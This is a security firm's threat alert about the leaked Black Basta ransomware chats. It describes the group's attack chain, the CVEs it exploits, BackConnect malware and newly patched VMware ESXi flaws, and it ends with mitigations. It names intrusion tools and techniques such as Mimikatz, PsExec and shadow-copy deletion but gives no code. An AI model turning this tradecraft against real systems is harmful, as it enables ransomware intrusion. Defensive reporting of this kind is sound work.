Black Basta Leaked Chats, BackConnect Malware & VMware vulnerabilities

In recent weeks, internal communications from the Black Basta ransomware group have been leaked, revealing crucial information regarding their tactics, techniques, and vulnerabilities exploited during attacks. Security vendors and researchers have since analysed these communications, and one of the most notable findings is a list of 62 CVEs (Common Vulnerabilities and Exposures) that Black Basta has used and continues to exploit in their operations. Notoriously, VMWare has released a new advisory on critical vulnerabilities found in VMware ESXi, Fusion, and other tools.

Threat alert
March 5, 2025

In recent weeks, internal communications from the Black Basta ransomware group have been leaked, revealing crucial information regarding their tactics, techniques, and vulnerabilities exploited during attacks. Security vendors and researchers have since analysed these communications, and one of the most notable findings is a list of 62 CVEs (Common Vulnerabilities and Exposures) that Black Basta has used and continues to exploit in their operations. Notoriously, VMWare has released a new advisory on critical vulnerabilities found in VMware ESXi, Fusion, and other tools.

BlackBasta Description:

Black Basta first emerged in April 2022, with researchers speculating it was formed by former members of the Conti and REvil ransomware gangs. Operating under the Ransomware-as-a-Service (RaaS) model, Black Basta follows a double-extortion strategy, encrypting data and threatening to release it unless a ransom is paid. The groups are mainly targeting high-revenue companies from industries that are more likely to handle sensitive data.  

Black Basta’s operations involve a sophisticated attack chain starting with initial access via RD Web and VPNs. One of the most recent techniques used by the group is email bombing—sending large volumes of spam emails to support social engineering efforts over Microsoft Teams. This tactic is designed to trick users into providing initial access via Remote Monitoring and Management (RMM) tools.

Black Basta has been observed scanning for internet-facing vulnerabilities in services such as Jenkins CI/CD, VMware ESXi, Citrix gateways, and VPNs with weak or default credentials. They also make use of widely available file-sharing platforms (e.g., transfer.sh, temp.sh) to host malicious payloads, reducing the need for custom infrastructure while evading detection.  

Black Basta employs ZoomInfo to profile potential victims, gaining insight into the organisation’s structure and vulnerabilities. This allows them to tailor their ransom demands based on the victim’s financial standing and perceived ability to pay.

Attack Chain

Spearphishing remains the primary method for gaining initial access, with Black Basta frequently leveraging Qakbot during the process. Once inside a network, Black Basta uses tools like SoftPerfect network scanner (netscan.exe) for reconnaissance while relying on credential scraping tools like Mimikatz.  The group uses several tools for lateral movement, including BITSAdmin, PsExec, and RDP as these allow them to spread throughout the network, gaining access to critical systems and data.

Once they’ve exfiltrated data, Black Basta typically changes file extensions to “.basta”. To further hinder recovery efforts, vssadmin.exe is used to delete volume shadow copies, making it more difficult for victims to restore from backups.

Vulnerabilities exploited by BlackBasta

Some of the flaws that Black Basta targets are long-known, widespread vulnerabilities, including:

  • CVE-2022-30190: The Follina vulnerability in Microsoft Office, which enables remote code execution via malicious Word attachments.
  • CVE-2021-44228: The infamous Log4Shell flaw in Log4j.
  • CVE-2022-22965: The Spring4Shell vulnerability.
  • CVE-2022-41028, CVE-2022-41040: The ProxyNotShell vulnerabilities affecting Microsoft Exchange.

However, what is particularly concerning is that Black Basta is quick to discuss newly discovered vulnerabilities, sometimes before they are officially published. Recent examples include:

  • CVE-2024-23113: Fortinet FortiOS vulnerability.
  • CVE-2024-25600: Bricks Builder WordPress Theme flaw.
  • CVE-2023-42115: Exim Email vulnerability.

A full list of the CVEs can be found here.

BackConnect, threat actor Cactus  & VMware vulnerabilities

Recently, several researchers have observed a new malware sample dubbed BackConnect that contained reference artefacts from QakBot. BackConnect acts as a proxy tool for remote access to compromised servers and allows DNS tunnelling. Both Qbot and BackConnect are believed to be linked to Black Basta however these are overlapping with the new threat actor group Cactus.  Trend Micro has observed the Cactus group utilising the same social engineering tactics, command and control, and attack flow associated with Black Basta.

Most notably, ESXi host compromise has been observed by Trend’s IR Team, where the binary socks.out was deployed, enabling further SSH sessions as the root user. VMware has been previously targeted by threat actors and the company recently released yet another advisory on a vulnerability that is observed exploited in the wild.  

VMCI heap-overflow vulnerability – CVE-2025-22224 (CVSS score: 9.3) – A Time-of-Check Time-of-Use (TOCTOU) vulnerability that leads to an out-of-bounds write and could allow a threat actor with local admin to execute malicious code.  

VMware ESXi arbitrary write vulnerability – CVE-2025-22225 (CVSS score: 8.2) – Arbitrary write vulnerability that could lead to an actor with privileges within VMX process to escape the sandbox.

HGFS information-disclosure vulnerability – CVE-2025-22226 (CVSS score: 7.1) – Information disclosure vulnerability due to an out-of-bounds read in HGFS that could lead to memory leak exploitation from the VMX process

Affected tools are VMware ESXi, VMware Workstation Pro / Player (Workstation), VMware Fusion, VMware Cloud Foundation, and VMware Telco Cloud Platform. Below are listed the vulnerable versions and appropriate fixes:

  • VMware ESXi 8.0 – Fixed in ESXi80U3d-24585383, ESXi80U2d-24585300
  • VMware ESXi 7.0 – Fixed in ESXi70U3s-24585291
  • VMware Workstation 17.x – Fixed in 17.6.3
  • VMware Fusion 13.x – Fixed in 13.6.3
  • VMware Cloud Foundation 5.x – Async patch to ESXi80U3d-24585383
  • VMware Cloud Foundation 4.x – Async patch to ESXi70U3s-24585291
  • VMware Telco Cloud Platform 5.x, 4.x, 3.x, 2.x – Fixed in ESXi 7.0U3s, ESXi 8.0U2d, and ESXi 8.0U3d
  • VMware Telco Cloud Infrastructure 3.x, 2.x – Fixed in ESXi 7.0U3s

Mitigations

  1. Update Software and Firmware: Apply patches for operating systems, software, and firmware immediately after release. Prioritise Known Exploited Vulnerabilities (KEVs).
  2. Implement Multi-Factor Authentication (MFA): Employ phishing-resistant MFA for all critical services.
  3. Secure Remote Access: Follow best practices for securing remote access services. Asses the usage of RMMs in your organisation, disable unnecessary RDP services and monitor the usage of the allowed tools.
  4. Backups: Ensure that critical systems and configurations are backed up regularly.

Here at Socura we are focusing on proactive threat hunts and creating rules to detect  malicious activities and threat actors behaviour.